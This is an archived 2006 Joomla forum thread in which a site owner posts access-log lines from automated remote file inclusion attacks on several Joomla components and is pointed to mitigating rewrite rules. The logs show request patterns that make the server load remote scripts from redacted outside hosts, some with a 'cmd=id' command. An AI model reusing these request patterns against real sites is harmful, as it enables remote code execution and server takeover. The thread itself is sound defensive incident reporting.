Joomla! :: View topic - List of New Joomla Module Attacks

Joomla! http://forum.joomla.org/

List of New Joomla Module Attacks http://forum.joomla.org/viewtopic.php?f=267&t=89352	Page 1 of 1

Author:	slinky [ Sun Aug 27, 2006 12:59 am ]
Post subject:	List of New Joomla Module Attacks
I was just rocked by something that I've stopped temporarily before too much mail got out. I was lucky to find my server crawl instantly and nail EXIM before too much went out. Here is what I've found (I have hidden the address for the ultimate file) -- UPDATE: Looking at the time I was getting nailed with "undeliverable message" warnings it looks like the remository extended is the culprit.... Looks like they are hitting MTree (I have version 1.59), Remository Extended (I will replace with the regular), and Artlinks (I don't have this installed?), Savant2?, HUNDREDS of requests to hit Comprofiler... is there any way to filter out attempts to hack a Joomla server in trying to hit the mos_config? This is just killing my server. Our troops shouldn't be in Iraq... they should be out seeking these @#$@#$s.... 81.24.26.185 - - [26/Aug/2006:18:28:57 -0400] "GET /administrator/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://XXXXXXXXXXXXXX/gi8ani/exploit.txt? HTTP/1.1" 301 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" 81.215.225.126 - - [26/Aug/2006:15:04:06 -0400] "GET /administrator/component/com_remository/admin.remository.php?mosConfig_absolute_path=http://XXXXXXXXX/test.tar.gz?&list=1&cmd=id HTTP/1.0" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)" 81.215.225.126 - - [26/Aug/2006:14:59:50 -0400] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://XXXXXXXX/test.tar.gz?&list=1&cmd=id HTTP/1.0" 200 46 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)" 58.224.150.102 - - [26/Aug/2006:12:36:39 -0400] "GET /components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://XXXXXXXXXXX/Poker/gyihhsqu.txt? HTTP/1.0" 200 46 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 61.3.96.8 - - [26/Aug/2006:12:36:22 -0400] "GET /com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http:XXXXXXXXX/Poker/gyihhsqu.txt? HTTP/1.0" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 60.190.243.175 - - [26/Aug/2006:12:35:58 -0400] "GET /Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://XXXXXXXXXX/Poker/gyihhsqu.txt? HTTP/1.0" 301 0 "-" "-" 201.248.90.194 - - [26/Aug/2006:12:34:45 -0400] "GET /Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://XXXXXXXX/Poker/gyihhsqu.txt? HTTP/1.0" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 201.248.90.194 - - [26/Aug/2006:12:34:40 -0400] "HEAD /Savant2_Plugin_textarea.php?mosConfig_absolute_path= HTTP/1.0" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" [WHAT IS THIS????] 212.55.155.34 - - [26/Aug/2006:07:18:22 -0400] "GET /component/option,com_comprofiler/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://XXXXXXXX/e.txt? HTTP/1.1" 200 25277 "-" "libwww-perl/5.803"

Author:	RobS [ Sun Aug 27, 2006 1:29 am ]
Post subject:	Re: List of New Joomla Module Attacks
slinky wrote: Is there any way to filter out attempts to hack a Joomla server in trying to hit the mos_config? This is just killing my server. http://forum.joomla.org/index.php/topic,75376.0.html Those rewrite rules are effective enough that it was decided to include them into the default htaccess.txt in Joomla! 1.0.11. I know of several high traffic sites running them without any problems. I hope it helps you too.

Author:	slinky [ Sun Aug 27, 2006 11:22 pm ]
Post subject:	Re: List of New Joomla Module Attacks
Perfect and muchas gracias. This is what I was looking for and will experiment with it. Incredible how many of these automated attacks are going on and CNET reported an increase in zombies of about 10% recently!

Page 1 of 1	All times are UTC
Powered by phpBB © 2000, 2002, 2005, 2007 phpBB Group http://www.phpbb.com/